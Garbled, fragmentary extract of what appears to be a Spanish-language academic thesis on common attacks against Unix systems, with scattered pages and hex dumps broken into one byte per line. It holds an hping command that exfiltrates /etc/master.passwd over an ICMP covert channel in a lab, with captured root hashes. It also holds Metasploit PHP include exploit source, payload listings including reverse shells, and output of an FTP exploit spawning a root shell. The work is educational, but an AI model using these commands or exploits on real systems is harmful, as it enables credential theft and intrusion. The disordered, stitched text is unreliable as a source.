se puede hacer un traceroute enviando paquetes IP con TTL incrementales
pero con payload TCP, por ejemplo.153
Fingerprinting de SOs.
Muchos otros.
el router y/o firewall, que rechaza los paquetes que simulan ser de un servidor
DNS. Luego con TTL igual a 8 no hay respuesta, seguramente es porque el
datagrama lleg a destino (200.68.121.140). Segundo, se enva un traceroute con
el puerto TCP 80 como destino: evidentemente el firewall (si lo hay) permite que
este puerto destino pase por l.
Tambin es de destacar la facilidad con la que Hping permite armar covert
channels sobre cualquier protocolo y puerto soportado, especialmente para
puertas traseras: en la Consola 30 se puede ver cmo se configura un canal
alternativo para enviar archivos utilizando el protocolo ICMP, utilizando el
payload del protocolo mismo (de 120 bytes) para enviar el contenido del archivo
de claves de un sistema FreeBSD.
Equipo comprometido:
[root@ciclon ~]# hping 192.168.0.2 --icmp -d 120 --sign clavebackdoor
--file /etc/master.passwd
HPING 192.168.0.2 (em0 192.168.0.2): icmp mode set, 28 headers + 120
data bytes
len=148 ip=192.168.0.2 ttl=64 id=29752 icmp_seq=0 rtt=2.1 ms
len=148 ip=192.168.0.2 ttl=64 id=29753 icmp_seq=1 rtt=0.7 ms
len=148 ip=192.168.0.2 ttl=64 id=29754 icmp_seq=2 rtt=1.5 ms
[...]
En el cliente:
marcelo@saturno:~$ sudo hping3 --listen clavebackdoor 192.168.0.30 -I
eth0 --icmp
hping3 listen mode
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp
$
#
root:$1$qFqk.00l$PCOb7WdgRlQdrH# $FreeBSD: src/etc/master.passwd,v 1.40
2005/06/06 20:19:56 brooks Exp $
#
root:$1$qFqk.00l$PCOb7WdgRlQdrHvVHTalK0:0:0::0:0:Charlie
&:/root:/usr/local/bin/bash
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:vVHTalK0:0:0::0:0:Charlie &:/root:/usr/local/bin/bash
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system
processes:/root:/usr/sbin/nologin
[...]
Consola 30: Ejemplo de un Covert Channel para Transferencia de archivos sobre ICMP
los primeros bytes de cada ping con informacin enviado por el equipo
comprometido (192.168.0.30). De esta manera, el Hping que est en modo
Listen (aunque en realidad es un proceso que est en modo promiscuo) puede
determinar que dicho paquete est dirigido a l.
Frame 1 (162 bytes on wire, 162 bytes captured)
Ethernet II, Src: 00:0c:29:e1:a2:26 (00:0c:29:e1:a2:26), Dst: 00:17:31:96:5b:1f
(00:17:31:96:5b:1f)
Internet Protocol, Src: 192.168.0.30 (192.168.0.30), Dst: 192.168.0.2
(192.168.0.2)
Internet Control Message Protocol
Type: 8 (Echo (ping) request)
Code: 0
Checksum: 0x4004 [correct]
Identifier: 0x1812
Sequence number: 0 (0x0000)
Data (120 bytes)
0000
0010
0020
0030
0040
0050
0060
0070
0080
0090
00a0
00
00
00
61
44
72
32
3a
0a
30
72
17
94
02
63
3a
2e
30
35
23
30
48
31
db
08
6b
20
70
30
36
0a
6c
96
8f
00
64
73
61
35
20
72
24
5b
00
40
6f
72
73
2f
62
6f
50
1f
00
04
6f
63
73
30
72
6f
43
00
40
18
72
2f
77
36
6f
74
4f
0c
01
12
23
65
64
2f
6f
3a
62
29
1d
00
20
74
2c
30
6b
24
37
e1
69
00
24
63
76
36
73
31
57
a2
c0
63
46
2f
20
20
20
24
64
26
a8
6c
72
6d
31
32
45
71
67
08
00
61
65
61
2e
30
78
46
52
00
1e
76
65
73
34
3a
70
71
6c
45
c0
65
42
74
30
31
20
6b
51
00
a8
62
53
65
20
39
24
2e
64
..1.[...)..&..E.
......@..i......
....@.....claveb
ackdoor# $FreeBS
D: src/etc/maste
r.passwd,v 1.40
2005/06/06 20:19
:56 brooks Exp $
.#.root:$1$qFqk.
00l$PCOb7WdgRlQd
rH
00
00
00
61
44
72
32
3a
0a
30
72
0c
94
1e
63
3a
2e
30
35
23
30
48
29
74
00
6b
20
70
30
36
0a
6c
e1
38
00
64
73
61
35
20
72
24
a2
00
48
6f
72
73
2f
62
6f
50
26
00
04
6f
63
73
30
72
6f
43
00
40
18
72
2f
77
36
6f
74
4f
17
01
12
23
65
64
2f
6f
3a
62
31
84
00
20
74
2c
30
6b
24
37
96
c0
00
24
63
76
36
73
31
57
5b
c0
63
46
2f
20
20
20
24
64
1f
a8
6c
72
6d
31
32
45
71
67
08
00
61
65
61
2e
30
78
46
52
00
02
76
65
73
34
3a
70
71
6c
45
c0
65
42
74
30
31
20
6b
51
00
a8
62
53
65
20
39
24
2e
64
..)..&..1.[...E.
..t8..@.........
....H.....claveb
ackdoor# $FreeBS
D: src/etc/maste
r.passwd,v 1.40
2005/06/06 20:19
:56 brooks Exp $
.#.root:$1$qFqk.
00l$PCOb7WdgRlQd
rH
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 110 de 210
00
00
00
61
30
20
63
72
72
73
6e
17
94
02
63
3a
26
61
3a
6e
65
3a
31
b8
08
6b
30
3a
6c
2a
65
72
96
ba
00
64
3a
2f
2f
3a
2d
3a
5b
00
17
6f
3a
72
62
30
61
2f
1f
00
21
6f
30
6f
69
3a
67
72
00
40
18
72
3a
6f
6e
30
61
6f
0c
01
12
76
30
74
2f
3a
69
6f
29
40
01
56
3a
3a
62
3a
6e
74
e1
3e
00
48
43
2f
61
30
20
3a
a2
c0
63
54
68
75
73
3a
53
0a
26
a8
6c
61
61
73
68
30
75
64
08
00
61
6c
72
72
0a
3a
70
61
00
1e
76
4b
6c
2f
74
42
65
65
45
c0
65
30
69
6c
6f
6f
72
6d
00
a8
62
3a
65
6f
6f
75
75
6f
..1.[...)..&..E.
......@.@>......
.....!....claveb
ackdoorvVHTalK0:
0:0::0:0:Charlie
&:/root:/usr/lo
cal/bin/bash.too
r:*:0:0::0:0:Bou
rne-again Superu
ser:/root:.daemo
n:
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 111 de 210
Inyeccin de cdigo
Escalado de Privilegios
Remotos
Locales
Segn su efecto
155 Estos usuarios que slo utilizan exploits sin conocer cmo funcionan se los llama Script
Kiddies en la jerga.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 113 de 210
relativa baja
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 115 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 116 de 210
require 'msf/core'
module Msf
class Exploits::Unix::Webapp::PHP_INCLUDE < Msf::Exploit::Remote
include Exploit::Remote::Tcp
include Exploit::Remote::HttpServer::PHPInclude
def initialize(info = {})
super(update_info(info,
'Name'
=> 'PHP Include Generic Exploit',
'Description'
=> %q{},
'Author'
=> [ 'hdm' ],
'License'
=> MSF_LICENSE,
'Version'
=> '$Revision: 5365 $',
'References'
=> [],
'Privileged'
=> false,
'Payload'
=>
{
'DisableNops' => true,
'Space'
=> 32768,
},
'Platform'
=> 'php',
'Arch'
=> ARCH_PHP,
'Targets'
=> [[ 'Automatic', { }]],
'DefaultTarget' =>0))
register_options([OptString.new('PHPURI', [true,
"The URI to request, with the include parameter
changed to !URL!", "/test.php?path=!URL!"]),],
self.class)
end
def php_exploit
connect
req = "GET #{datastore['PHPURI'].gsub('!URL!',
Rex::Text.uri_encode(php_include_url))}
HTTP/1.0\r\n\r\n"
print_status("Sending: #{req}")
sock.put(req)
disconnect
end
end
end
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 117 de 210
plataforma.
b) Encoding: Sirve para ofuscar161 el contenido de un payload. Es
importante utilizarlo en caso de tener la certeza de que hay un IDS
verificando el trfico que se enva al objetivo.
c) Jobs (Trabajos): En ocasiones es necesario dividir una tarea en varios
trabajos. Los Jobs o trabajos se definen como tems de trabajo finitos
que tienen una tarea especfica. De esta manera, la idea es facilitar la
coordinacin de estos trabajos con funciones especficas para ello.
d) Logging: Es un servicio de mensajes de estado (Logs) dentro del
Framework, clasificado por niveles (de 0 a 3).
e) Post-exploitation: Este mdulo provee servicios ya incorporados para
utilizar remotamente el objetivo una vez que el exploit tuvo xito. Por
ejemplo, la clase Stdapi162 se disponen una gran variedad de
funciones: acceso a archivos, red, sistema y otras propiedades de la
mquina remota que son casi universales.
f) Protocols: Da soporte a protocolos estndar como HTTP, SMB,
DCERPC y SUNRPC.
g) Services: Permite que uno o varios exploits se registren como
Servicio y escuchen (en modo promiscuo) por trfico (y que bien
podran ser resultados) al mismo tiempo.
h) Sockets: Provee acceso a la API de Sockets de Red (Clientes y
Servidores TCP/UDP, manejo de SSL, etc.).
i) Synchronization: Dado que MSF hace uso del Multi-Threading, aqu
se proveen rutinas que permiten aprovecharlo.
2. Framework Core: Implementa un conjunto de clases que funcionan de
interfaz a los mdulos y plugins del framework; es decir, si se desea hacer
un plugin o un mdulo para MSF, es necesario trabajar con este
componente. Trabaja con un enfoque basado en instancias del framework.
a) DataStore: Acta como un repositorio de datos del entorno de la
instancia.
b) Event Notifications: Permite que los desarrolladores de mdulos y
161 Ver Glosario: Ofuscacin, pg. 193.
1623.1/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb.
La clase Stdapi se encuentra en el archivo
ubicado
en
/framework-
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 119 de 210
los exploits. El problema con los NOPs triviales es que son fcilmente
identificables en un payload por un IDS. Con este generador, es
sencillo crear NOPs que funcionen igual, pero de longitud variable y
pseudoaleatorios.
d) Payload: Proveen cdigo al Framework que puede ser ejecutado luego
de que un exploit tenga xito al controlar el flujo de ejecucin. MSF
dispone de unas cuantas opciones, y para crear uno nuevo hace falta
crear una clase que herede de Msf::Payload. De esta manera pueden
agregarse acciones personalizadas, o soportar otra arquitectura que no
est disponible previamente.
e) Auxiliary Modules: Se trata de utilidades incluidas en el MSF que no
tienen que ver directamente con explotar un objetivo, sino con
actividades relacionadas: ejecutar un Port Scan, provocar un DoS163
conocido en un software, loguearse en una Base de Datos, interactuar
con algn Servicio, detectar la versin de un servidor, etc.
6. Framework Plugins: Para diferenciarlo de los mdulos, puede pensarse a
los plugins como piezas diseadas para modificar el Framework mismo. El
objetivo puede ser cualquiera, ya que en primera instancia se permite hacer
cualquier cosa con l. MSF dispone de mdulos para conexin a Bases de
Datos (PostgreSQL, MySQL y SQLite), otro que ejecuta MSF como un
servicio en un socket, etc. De esta manera, el plugin para conexin a bases
de datos permite, por ejemplo, atacar un conjunto de hosts de acuerdo al
contenido de una tabla.
Description
----------You're looking at it baby!
Show information about this module
Show available options for this module
Show available advanced options for this module
Show available ids evasion options for this module
Show available payloads for this module
Show available targets for this exploit module
Show available actions for this auxiliary module
Run the check routine of the selected module
Execute the selected module
Exploits
========
Name
---exploit/bsdi/softcart/mercantec_softcart
Overflow
exploit/freebsd/tacacs/xtacacsd_report
Buffer Overflow
exploit/hpux/lpd/cleanup_exec
[...]
Description
----------Mercantec SoftCart CGI
XTACACSD <= 4.1.2 report()
HP-UX LPD Command Execution
Auxiliary
=========
Name
---auxiliary/admin/backupexec/dump
Remote File Access
auxiliary/admin/backupexec/registry
Registry Access
auxiliary/admin/cisco/ios_http_auth_bypass
Administrative Access
[...]
Description
----------Veritas Backup Exec Windows
Veritas Backup Exec Server
Cisco IOS HTTP Unauthorized
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 122 de 210
=[
+ -- --=[
+ -- --=[
=[
msf >
msf v3.1-release
269 exploits - 118 payloads
17 encoders - 6 nops
46 aux
info exploit/linux/ids/snortbopre
Name:
Version:
Platform:
Privileged:
License:
Provided by:
KaiJern Lau <xwings@mysec.org>
Available targets:
Id Name
-- ---0
Debian 3.1 Sarge
Basic options:
Name
Current Setting
-----------------RHOST
RPORT 9080
Required
-------yes
yes
Description
----------The target address
The target port
Payload information:
Space: 1073
Avoid: 1 characters
Description:
This module exploits a stack overflow in the Back Orifice
pre-processor module included with Snort versions 2.4.0, 2.4.1,
2.4.2, and 2.4.3. This vulnerability could be used to completely
compromise a Snort sensor, and would typically gain an attacker full
root or administrative privileges.
References:
http://www.securityfocus.com/bid/15131
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-3252
http://xforce.iss.net/xforce/alerts/id/207
msf > show exploits
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 123 de 210
_
_
_ _
| |
||
(_) |
_ __ ___
___| |_ __ _ ___ _ __ || ___ _| |_
| '_ ` _ \ / _ \ __/ _`/ __| '_ \| |/ _ \| | __|
| || ||| __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|
Name
------RHOST
THREADS
RPORT
Default
------25
139
Description
--------------------------------The target address
The number of concurrent attempts
The samba port
164 Samba es un software para Unix que implementa el protocolo SMB/CIFS, que es el que utiliza
Windows para compartir archivos e impresoras en una Red. Adems, permite integrar
estaciones de trabajo Unix a redes Windows. URL: http://www.samba.org
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 125 de 210
0
1
2
3
4
5
6
7
Samba
Samba
Samba
Samba
Samba
Samba
Samba
Samba
linux_ia32_reverse
linux_ia32_reverse_impurity
Upload/Execute
linux_ia32_reverse_stg
linux_ia32_reverse_udp
Linux
Linux
Linux
Linux
Linux
Linux
Linux
Linux
Linux
IA32
IA32
IA32
IA32
IA32
IA32
IA32
IA32
IA32
Add User
Bind Shell
Staged Bind Shell
Execute Command
Recv Tag Findsock Shell
Staged Findsock Shell
SrcPort Findsock Shell
Reverse Shell
Reverse Impurity
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 126 de 210
30
30
30
30
30
30
30
30
30
30
30
30
30
30
30
30
07
eb
eb
eb
eb
eb
eb
eb
eb
eb
eb
90
01
e3
30
30
30
30
30
30
30
30
30
30
30
30
30
30
30
30
08
0c
0c
0c
0c
0c
0c
0c
0c
0c
0c
90
50
fe
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
............x...
................
................
................
................
................
................
................
................
................
................
................
..1.C..tQ.-....P
..j.X......1....
.Yj.X.........
padchunk_size = 0x00000018
==> 15
# 3. triggering free(globlist[1])
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
#######################################################################
#####
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
Linux rh62 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i?86 unknown
pwd
/home/ftp
ls
cd /
pwd
/
ls
bin
boot
dev
etc
home
lib
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 129 de 210
lost+found
mnt
opt
proc
root
sbin
tmp
usr
var
uname -a
Linux rh62 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i?86 unknown
id
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
Security
cursos, informacin
CrackMe170 para comenzar a aprender sobre hacking.
Learn
Online:
Incluye
varios
http://www.learnsecurityonline.com/index.php
47
815
1618
1931
Offset
0
32
64
96
128
160
160/192+ Datos
Bits 3-6
Precedencia
Delay | Throughput
Tipo de Servicio
| Reliability
Bit 7
Reservado
Bits 6-7
Campo DS - DiffServ
Flags:
Bit 0
Bit 1
Bit 2
Reservado
No Fragmentar - DF
Ms Fragmentos - MF
Longitud Total en Bytes (16 bits): Contiene la longitud total del datagrama,
incluyendo encabezado y payload.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 132 de 210
47
815
1631
offset
Puerto Origen Source Port
Nro. de Secuencia - Sequence number
Nmero de ACK - Acknowledgment number
0
32
64
96
128
Puerto Destino
Offset de Datos Reservado CWR ECE URG ACK PSH RST SYN FIN Window Size
Checksum
Puntero Urgente
Opciones (opcional)
160
160/192+ Datos
Puerto Destino (16 Bits): 2 Bytes indicando el puerto destino del segmento
Nmero de ACK (32 Bits): Si el bit de ACK est activado (0x1), entonces el
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 133 de 210
Flags (8 Bits):
conexin.
Puntero Urgente (16 Bits): Si el bit URG est activado, este valor es el
desplazamiento (offset) que hay que sumar al valor del Nmero de Secuencia
para obtener el ltimo byte de los datos urgentes.
Datos
Puerto Destino (16 Bits): 2 Bytes indicando el puerto destino del datagrama
UDP.
Bits 8-15
Tipo de ICMP
Cdigo
Bits 16-31
Offset
0
32
Checksum
ID Identificador
Nmero de Secuencia
Prohibida
Communication
Administratively
Prohibited).
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 135 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 136 de 210
IP
Sistema Operativo
RAM
Saturno
192.168.0.2
1,5GB
Tornado
192.168.0.20
128MB
Ciclon
192.168.0.30
256MB
Trueno
192.168.0.60
256MB
Tsunami
192.168.0.100
256MB
#!/usr/bin/python
# -*- coding: utf-8 -*import sys
import scapy
""" pcap_parser.py
Este script carga un archivo pcap guardado por
ejemplo con Wireshark y reconstruir sus paquetes con Scapy, para
cualquier objetivo (por ejemplo, sirve para hacer replay de algunas
tramas, paquetes o segmentos, a cualquier nivel).
En este caso en particular, el main itera por cada paquete del pcap y
llama a una funcion "print_packet" para que la imprima por stdout.
La ventaja contra el export de Wireshark es que puedo imprimir
cualquier campo a cualquier nivel de cada paquete, obteniendo un
control total del proceso. Surgi como necesidad de formatear un
Idle Scan, donde era necesario mostrar el IP-ID de cada paquete del
Zombie.
Tecnica para templates sencillos:
http://www.noah.org/wiki/Python_templates
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 138 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 139 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 140 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 141 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 142 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 143 de 210
B.2.8.3 NULLScan
Paquete Nro: 1 - Tiempo: 0.000000
IP Origen: 00:17:31:96:5b:1f: -> IP Destino: ff:ff:ff:ff:ff:ff:
Protocolo: ARP
Descripcin: Who has 192.168.0.30? Tell 192.168.0.2
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 144 de 210
B.2.8.4 XmasScan
IP Origen: 00:17:31:96:5b:1f: -> IP Destino: ff:ff:ff:ff:ff:ff:
Protocolo: ARP
Descripcin: Who has 192.168.0.30? Tell 192.168.0.2
Paquete Nro: 2 - Tiempo: 0.000300
IP Origen: 00:0c:29:e1:a2:26: -> IP Destino: 00:17:31:96:5b:1f:
Protocolo: ARP
Descripcin: 192.168.0.30 is at 00:0c:29:e1:a2:26
Paquete Nro: 3 - Tiempo: 0.031896
IP Origen: 192.168.0.2:35725 -> IP Destino: 192.168.0.30:22
Protocolo: TCP
Descripcin: 35725 > 22 [FIN, PSH, URG] Seq=0 Urg=0 Len=0
Paquete Nro: 4 - Tiempo: 0.032109
IP Origen: 192.168.0.2:35725 -> IP Destino: 192.168.0.30:21
Protocolo: TCP
Descripcin: 35725 > 21 [FIN, PSH, URG] Seq=0 Urg=0 Len=0
Paquete Nro: 5 - Tiempo: 0.032217
IP Origen: 192.168.0.30:21 -> IP Destino: 192.168.0.2:35725
Protocolo: TCP
Descripcin: 21 > 35725 [RST, ACK] Seq=0 Ack=0 Win=0 Len=0
Paquete Nro: 6 - Tiempo: 0.032287
IP Origen: 192.168.0.2:35725 -> IP Destino: 192.168.0.30:20
Protocolo: TCP
Descripcin: 35725 > 20 [FIN, PSH, URG] Seq=0 Urg=0 Len=0
Paquete Nro: 7 - Tiempo: 0.032364
IP Origen: 192.168.0.30:20 -> IP Destino: 192.168.0.2:35725
Protocolo: TCP
Descripcin: 20 > 35725 [RST, ACK] Seq=0 Ack=0 Win=0 Len=0
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 145 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 146 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 147 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 148 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 149 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 150 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 151 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 152 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 153 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 154 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 155 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 156 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 157 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 158 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 159 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 160 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 161 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 162 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 163 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 164 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 165 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 166 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 167 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 168 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 170 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 171 de 210
00
00
00
61
44
72
32
3a
0a
30
72
17
94
02
63
3a
2e
30
35
23
30
48
31
db
08
6b
20
70
30
36
0a
6c
96
8f
00
64
73
61
35
20
72
24
5b
00
40
6f
72
73
2f
62
6f
50
1f
00
04
6f
63
73
30
72
6f
43
00
40
18
72
2f
77
36
6f
74
4f
0c
01
12
23
65
64
2f
6f
3a
62
29
1d
00
20
74
2c
30
6b
24
37
e1
69
00
24
63
76
36
73
31
57
a2
c0
63
46
2f
20
20
20
24
64
26
a8
6c
72
6d
31
32
45
71
67
08
00
61
65
61
2e
30
78
46
52
00
1e
76
65
73
34
3a
70
71
6c
45
c0
65
42
74
30
31
20
6b
51
00
a8
62
53
65
20
39
24
2e
64
..1.[...)..&..E.
......@..i......
....@.....claveb
ackdoor# $FreeBS
D: src/etc/maste
r.passwd,v 1.40
2005/06/06 20:19
:56 brooks Exp $
.#.root:$1$qFqk.
00l$PCOb7WdgRlQd
rH
00
00
00
61
44
72
32
3a
0a
30
72
0c
94
1e
63
3a
2e
30
35
23
30
48
29
74
00
6b
20
70
30
36
0a
6c
e1
38
00
64
73
61
35
20
72
24
a2
00
48
6f
72
73
2f
62
6f
50
26
00
04
6f
63
73
30
72
6f
43
00
40
18
72
2f
77
36
6f
74
4f
17
01
12
23
65
64
2f
6f
3a
62
31
84
00
20
74
2c
30
6b
24
37
96
c0
00
24
63
76
36
73
31
57
5b
c0
63
46
2f
20
20
20
24
64
1f
a8
6c
72
6d
31
32
45
71
67
08
00
61
65
61
2e
30
78
46
52
00
02
76
65
73
34
3a
70
71
6c
45
c0
65
42
74
30
31
20
6b
51
00
a8
62
53
65
20
39
24
2e
64
..)..&..1.[...E.
..t8..@.........
....H.....claveb
ackdoor# $FreeBS
D: src/etc/maste
r.passwd,v 1.40
2005/06/06 20:19
:56 brooks Exp $
.#.root:$1$qFqk.
00l$PCOb7WdgRlQd
rH
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 172 de 210
0000
0010
0020
0030
0040
0050
0060
0070
0080
0090
00a0
00
00
00
61
30
20
63
72
72
73
6e
17
94
02
63
3a
26
61
3a
6e
65
3a
31
b8
08
6b
30
3a
6c
2a
65
72
96
ba
00
64
3a
2f
2f
3a
2d
3a
5b
00
17
6f
3a
72
62
30
61
2f
1f
00
21
6f
30
6f
69
3a
67
72
00
40
18
72
3a
6f
6e
30
61
6f
0c
01
12
76
30
74
2f
3a
69
6f
29
40
01
56
3a
3a
62
3a
6e
74
e1
3e
00
48
43
2f
61
30
20
3a
a2
c0
63
54
68
75
73
3a
53
0a
26
a8
6c
61
61
73
68
30
75
64
08
00
61
6c
72
72
0a
3a
70
61
00
1e
76
4b
6c
2f
74
42
65
65
45
c0
65
30
69
6c
6f
6f
72
6d
00
a8
62
3a
65
6f
6f
75
75
6f
..1.[...)..&..E.
......@.@>......
.....!....claveb
ackdoorvVHTalK0:
0:0::0:0:Charlie
&:/root:/usr/lo
cal/bin/bash.too
r:*:0:0::0:0:Bou
rne-again Superu
ser:/root:.daemo
n:
marcelo@saturno:/media/Informacion/Mis Documentos/UNLu/Tesis/Recursos
Tesis/Capturas/Cap6$ less 2-Covert\ Channel\ con\ HPing\ -\ Completo.txt
marcelo@saturno:/media/Informacion/Mis Documentos/UNLu/Tesis/Recursos
Tesis/Capturas/Cap6$ less 2-Covert\ Channel\ con\ HPing\ -\ Completo.txt
marcelo@saturno:/media/Informacion/Mis Documentos/UNLu/Tesis/Recursos
Tesis/Capturas/Cap6$
marcelo@saturno:/media/Informacion/Mis Documentos/UNLu/Tesis/Recursos
Tesis/Capturas/Cap6$ cat 2-Covert\ Channel\ con\ HPing\ -\ Completo.txt
Frame 1 (162 bytes on wire, 162 bytes captured)
Ethernet II, Src: 00:0c:29:e1:a2:26 (00:0c:29:e1:a2:26), Dst: 00:17:31:96:5b:1f
(00:17:31:96:5b:1f)
Internet Protocol, Src: 192.168.0.30 (192.168.0.30), Dst: 192.168.0.2
(192.168.0.2)
Internet Control Message Protocol
Type: 8 (Echo (ping) request)
Code: 0 ()
Checksum: 0x4004 [correct]
Identifier: 0x1812
Sequence number: 0 (0x0000)
Data (120 bytes)
Data: 636C6176656261636B646F6F72232024467265654253443A...
0000
0010
0020
0030
0040
0050
0060
0070
0080
0090
00a0
00
00
00
61
44
72
32
3a
0a
30
72
17
94
02
63
3a
2e
30
35
23
30
48
31
db
08
6b
20
70
30
36
0a
6c
96
8f
00
64
73
61
35
20
72
24
5b
00
40
6f
72
73
2f
62
6f
50
1f
00
04
6f
63
73
30
72
6f
43
00
40
18
72
2f
77
36
6f
74
4f
0c
01
12
23
65
64
2f
6f
3a
62
29
1d
00
20
74
2c
30
6b
24
37
e1
69
00
24
63
76
36
73
31
57
a2
c0
63
46
2f
20
20
20
24
64
26
a8
6c
72
6d
31
32
45
71
67
08
00
61
65
61
2e
30
78
46
52
00
1e
76
65
73
34
3a
70
71
6c
45
c0
65
42
74
30
31
20
6b
51
00
a8
62
53
65
20
39
24
2e
64
..1.[...)..&..E.
......@..i......
....@.....claveb
ackdoor# $FreeBS
D: src/etc/maste
r.passwd,v 1.40
2005/06/06 20:19
:56 brooks Exp $
.#.root:$1$qFqk.
00l$PCOb7WdgRlQd
rH
00
00
00
61
44
72
32
3a
0a
30
72
0c
94
1e
63
3a
2e
30
35
23
30
48
29
74
00
6b
20
70
30
36
0a
6c
e1
38
00
64
73
61
35
20
72
24
a2
00
48
6f
72
73
2f
62
6f
50
26
00
04
6f
63
73
30
72
6f
43
00
40
18
72
2f
77
36
6f
74
4f
17
01
12
23
65
64
2f
6f
3a
62
31
84
00
20
74
2c
30
6b
24
37
96
c0
00
24
63
76
36
73
31
57
5b
c0
63
46
2f
20
20
20
24
64
1f
a8
6c
72
6d
31
32
45
71
67
08
00
61
65
61
2e
30
78
46
52
00
02
76
65
73
34
3a
70
71
6c
45
c0
65
42
74
30
31
20
6b
51
00
a8
62
53
65
20
39
24
2e
64
..)..&..1.[...E.
..t8..@.........
....H.....claveb
ackdoor# $FreeBS
D: src/etc/maste
r.passwd,v 1.40
2005/06/06 20:19
:56 brooks Exp $
.#.root:$1$qFqk.
00l$PCOb7WdgRlQd
rH
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 173 de 210
00
00
00
61
30
20
63
72
72
73
6e
17
94
02
63
3a
26
61
3a
6e
65
3a
31
b8
08
6b
30
3a
6c
2a
65
72
96
ba
00
64
3a
2f
2f
3a
2d
3a
5b
00
17
6f
3a
72
62
30
61
2f
1f
00
21
6f
30
6f
69
3a
67
72
00
40
18
72
3a
6f
6e
30
61
6f
0c
01
12
76
30
74
2f
3a
69
6f
29
40
01
56
3a
3a
62
3a
6e
74
e1
3e
00
48
43
2f
61
30
20
3a
a2
c0
63
54
68
75
73
3a
53
0a
26
a8
6c
61
61
73
68
30
75
64
08
00
61
6c
72
72
0a
3a
70
61
00
1e
76
4b
6c
2f
74
42
65
65
45
c0
65
30
69
6c
6f
6f
72
6d
00
a8
62
3a
65
6f
6f
75
75
6f
..1.[...)..&..E.
......@.@>......
.....!....claveb
ackdoorvVHTalK0:
0:0::0:0:Charlie
&:/root:/usr/lo
cal/bin/bash.too
r:*:0:0::0:0:Bou
